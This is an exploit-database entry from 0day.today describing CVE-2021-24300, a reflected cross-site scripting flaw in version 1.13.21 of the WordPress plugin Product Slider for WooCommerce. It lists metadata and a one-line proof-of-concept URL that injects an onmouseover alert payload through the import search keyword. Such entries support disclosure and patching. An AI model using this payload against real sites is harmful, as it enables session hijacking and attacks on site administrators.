[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Product Slider for WooCommerce 1.13.21 Plugin - Cross Site Scripting Vulnerability

Author
0xB9
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-37303
Category
web applications
Date add
02-02-2022
CVE
CVE-2021-24300
Platform
php
# Exploit Title: WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/woocommerc...ts-slider/
# Version: 1.13.21
# Tested on: Windows 10
# CVE: CVE-2021-24300

1. Description:
This plugin is a easy carousel slider for WooCommerce products. The slider import search feature is vulnerable to reflected cross-site scripting.

2. Proof of Concept:
wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover=alert(1);//

#  0day.today [2024-07-03]  #